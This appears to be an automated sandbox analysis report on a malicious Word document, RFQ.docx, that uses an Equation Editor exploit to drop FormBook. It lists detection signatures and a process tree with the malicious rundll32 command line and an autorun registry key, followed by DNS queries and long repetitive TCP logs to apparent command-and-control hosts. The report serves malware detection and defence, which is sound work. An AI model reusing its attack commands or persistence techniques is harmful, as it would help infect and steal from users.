Windows Analysis Report
RFQ.docx

Overview

General Information

Sample name:RFQ.docx
Analysis ID:1553493
MD5:933dd0e0dd85baf5ac3c57fda0731637
SHA1:a37b19652dcd96f996c94bb44d9ba059b4cf9802
SHA256:cf5b221d161fbe82fd8cecb463d515b8469fc9dd05073eb3c3135b9823f571b0
Tags: docx, user-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Creates an undocumented autostart registry key
Document contains OLE streams with names of living off the land binaries
Document exploit detected (process start blacklist hit)
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office process drops PE file
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: ImagingDevices Unusual Parent/Child Processes
Sigma detected: Potential PowerShell Execution Via DLL
Sigma detected: Suspicious Microsoft Office Child Process
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document misses a certain OLE stream usually present in this Microsoft Office document type
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches the installation path of Mozilla Firefox
Sigma detected: CurrentVersion Autorun Keys Modification
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3328 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3408 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • cmd.exe (PID: 3456 cmdline: CmD.exe /C rundll32 %tmp%\xwizard.,IEX A C MD5: AD7B9C14083B52BC532FBA5948342B98)
        • rundll32.exe (PID: 3480 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\xwizard.,IEX A C MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 3488 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\xwizard.,IEX A C MD5: DD81D91FF3B0763C392422865C9AC12E)
            • ImagingDevices.exe (PID: 3620 cmdline: "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" MD5: 44131EEA626ABDBEF6631F72C007FC0E)
              • mVjlVtpvDsvJ.exe (PID: 1780 cmdline: "C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                • convert.exe (PID: 3704 cmdline: "C:\Windows\SysWOW64\convert.exe" MD5: FA5C490197C97EC58CF751F8CE6439D3)
                  • mVjlVtpvDsvJ.exe (PID: 2184 cmdline: "C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                  • firefox.exe (PID: 3992 cmdline: "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp | EXP_potential_CVE_2017_11882 | unknown | ReversingLabs
  • 0x0:$docfilemagic: D0 CF 11 E0 A1 B1 1A E1
  • 0xbc300:$equation1: Equation Native
  • 0xbca80:$equation1: Equation Native
  • 0x920:$equation2: Microsoft Equation 3.0
  • 0xbc720:$equation2: Microsoft Equation 3.0
  • 0xba019:$http: http://
  • 0xba043:$http: http://
  • 0xba085:$http: http://
  • 0xba4f6:$http: http://
  • 0xba51b:$http: http://
  • 0xba557:$http: http://
  • 0xba5a0:$http: http://
  • 0xbaae8:$http: http://
  • 0xbab0e:$http: http://
  • 0xbab58:$http: http://
  • 0xbb08f:$http: http://
  • 0xbb0b5:$http: http://
  • 0xbb0fd:$http: http://
  • 0xbb735:$http: http://
  • 0xbb79f:$http: http://
  • 0xbb7c5:$http: http://
Source | Rule | Description | Author | Strings
0000000B.00000002.648541156.00000000007F0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000009.00000002.497403170.00000000001E0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000B.00000002.648550804.0000000000840000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000C.00000002.648430732.00000000008F0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
Source | Rule | Description | Author | Strings
9.2.ImagingDevices.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

              System Summary

              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe" , CommandLine: "C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe, NewProcessName: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe, OriginalFileName: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe, ParentCommandLine: "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe", ParentImage: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe, ParentProcessId: 3620, ParentProcessName: ImagingDevices.exe, ProcessCommandLine: "C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe" , ProcessId: 1780, ProcessName: mVjlVtpvDsvJ.exe
              Source: Process startedAuthor: Markus Neis, Nasreddine Bencherchali: Data: Command: rundll32 C:\Users\user\AppData\Local\Temp\xwizard.,IEX A C, CommandLine: rundll32 C:\Users\user\AppData\Local\Temp\xwizard.,IEX A C, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: CmD.exe /C rundll32 %tmp%\xwizard.,IEX A C, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3456, ParentProcessName: cmd.exe, ProcessCommandLine: rundll32 C:\Users\user\AppData\Local\Temp\xwizard.,IEX A C, ProcessId: 3480, ProcessName: rundll32.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: CmD.exe /C rundll32 %tmp%\xwizard.,IEX A C, CommandLine: CmD.exe /C rundll32 %tmp%\xwizard.,IEX A C, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3408, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: CmD.exe /C rundll32 %tmp%\xwizard.,IEX A C, ProcessId: 3456, ProcessName: cmd.exe
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\convert.exe, ProcessId: 3704, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ANPPAN
              Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\convert.exe, ProcessId: 3704, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3328, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
              No Suricata rule has matched

              AV Detection

              Source: C:\Users\user\AppData\Local\Temp\wcC8DC.tmpAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
              Source: C:\Users\user\AppData\Local\Temp\wcC8DC.tmpReversingLabs: Detection: 68%
              Source: C:\Users\user\AppData\Local\Temp\xwizardReversingLabs: Detection: 23%
              Source: RFQ.docxReversingLabs: Detection: 15%
              Source: Yara matchFile source: 9.2.ImagingDevices.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000B.00000002.648541156.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.497403170.00000000001E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.648550804.0000000000840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.648430732.00000000008F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.553330249.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.648308986.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.497567649.0000000002200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\AppData\Local\Temp\wcC8DC.tmpJoe Sandbox ML: detected

              Exploits

              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe
              Source: ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drStream path '_1792802952/\x1CompObj' : ...................F....Microsoft Equation 3.0....
              Source: ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drStream path '_1792802956/\x1CompObj' : ...................F....Microsoft Equation 3.0....
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: unknownHTTPS traffic detected: 153.121.40.91:443 -> 192.168.2.22:49161 version: TLS 1.2
              Source: Binary string: ImagingDevices.pdb source: convert.exe, 0000000B.00000002.648888514.000000000287C000.00000004.10000000.00040000.00000000.sdmp, convert.exe, 0000000B.00000002.648352209.0000000000200000.00000004.00000020.00020000.00000000.sdmp, mVjlVtpvDsvJ.exe, 0000000C.00000000.510314863.000000000329C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.553400989.000000000126C000.00000004.80000000.00040000.00000000.sdmp
              Source: Binary string: convert.pdb source: ImagingDevices.exe, 00000009.00000002.497445868.00000000005F4000.00000004.00000020.00020000.00000000.sdmp, mVjlVtpvDsvJ.exe, 0000000A.00000002.648365477.0000000000744000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mVjlVtpvDsvJ.exe, 0000000A.00000002.648477658.000000000126E000.00000002.00000001.01000000.00000004.sdmp, mVjlVtpvDsvJ.exe, 0000000C.00000002.648546360.000000000126E000.00000002.00000001.01000000.00000004.sdmp
              Source: Binary string: wntdll.pdb source: ImagingDevices.exe, ImagingDevices.exe, 00000009.00000003.476693111.0000000000450000.00000004.00000020.00020000.00000000.sdmp, ImagingDevices.exe, 00000009.00000002.497469157.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, ImagingDevices.exe, 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, ImagingDevices.exe, 00000009.00000003.477063073.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.648597761.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 0000000B.00000003.497780980.0000000001E40000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 0000000B.00000003.497414077.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.648597761.0000000002150000.00000040.00001000.00020000.00000000.sdmp

              Software Vulnerabilities

              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: xwizard.1.dr
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
              Source: global trafficDNS query: name: www.diced.jp
              Source: global trafficDNS query: name: www.d63dm.top
              Source: global trafficDNS query: name: www.sqlite.org
              Source: global trafficDNS query: name: www.danceonwater.net
              Source: global trafficDNS query: name: www.foshape.top
              Source: global trafficDNS query: name: www.swiftbyrte.xyz
              Source: global trafficDNS query: name: www.maryneedskidneys.info
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 154.23.184.218:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.91.197.27:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 206.238.184.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49175 -> 209.74.64.59:80
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 154.23.184.218:80
              Source: global trafficTCP traffic: 154.23.184.218:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 154.23.184.218:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 154.23.184.218:80
              Source: global trafficTCP traffic: 154.23.184.218:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 154.23.184.218:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 154.23.184.218:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 154.23.184.218:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 154.23.184.218:80
              Source: global trafficTCP traffic: 154.23.184.218:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
